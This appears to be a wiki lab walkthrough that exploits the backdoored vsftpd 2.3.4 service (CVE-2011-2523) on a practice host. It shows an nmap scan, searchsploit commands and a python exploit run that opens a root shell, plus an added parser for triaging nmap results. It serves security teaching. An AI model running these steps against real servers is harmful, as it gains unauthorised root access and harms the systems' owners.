Vsftp4 attack

From xinux.net
Revision as of 10 April 2024, 13:45 by Thomas.will

Attacker

Scan

  • nmap -sV --script vuln 10.0.10.105 -p 21
Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-27 19:27 CEST
Nmap scan report for metaspoitable.hack.lab (10.0.10.105)
Host is up (0.00088s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|       https://www.securityfocus.com/bid/48539
|_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
MAC Address: 0C:67:68:58:00:00 (Unknown)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
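
For triaging scan results like the one above on the defender's side, this added example (not part of the original page) parses Nmap's normal output and returns every NSE script block that reports "State: VULNERABLE", together with host, port, service version and CVE IDs. The function name and the embedded sample (shortened from the output above, plus one constructed port line) are assumptions of this example.

```python
import re

# Sample shortened from the scan output above; the 22/tcp line is constructed.
SAMPLE = """\
Nmap scan report for metaspoitable.hack.lab (10.0.10.105)
Host is up (0.00088s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
| ftp-vsftpd-backdoor:
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|_    Disclosure date: 2011-07-03
22/tcp open  ssh     OpenSSH 4.7p1
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?([0-9a-fA-F.:]+)\)?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# Script headers start right after "| " or "|_"; block content is indented further.
SCRIPT_RE = re.compile(r"^\|[ _]([A-Za-z0-9_.-]+):(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def vulnerable_findings(nmap_text):
    """Return one dict per NSE script block that reports 'State: VULNERABLE'."""
    findings, host, port, current = [], None, None, None
    for line in nmap_text.splitlines():
        if m := HOST_RE.match(line):
            host, port, current = m.group(1), None, None
        elif m := PORT_RE.match(line):
            port = {"port": int(m.group(1)), "proto": m.group(2),
                    "state": m.group(3), "service": m.group(4),
                    "version": m.group(5).strip()}
            current = None
        elif line.startswith("|"):
            if m := SCRIPT_RE.match(line):
                # A new script block begins under the current port.
                current = {"host": host, **(port or {}),
                           "script": m.group(1), "cves": []}
            if current is None:
                continue
            # "NOT VULNERABLE" and "LIKELY VULNERABLE" do not match this string.
            if "State: VULNERABLE" in line and current not in findings:
                findings.append(current)
            for cve in CVE_RE.findall(line):
                if cve not in current["cves"]:
                    current["cves"].append(cve)
    return findings
```
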

Searchsploit

  • searchsploit vsftpd 2.3.4
  • searchsploit -m 49757 unix/remote/49757.py

Search Google for the exploit

CVE-2011-2523 exploit-db

Find the exploit

Run the exploit

Try several times

  • python3 49757.py 10.0.10.105
Success, shell opened
Send `exit` to quit shell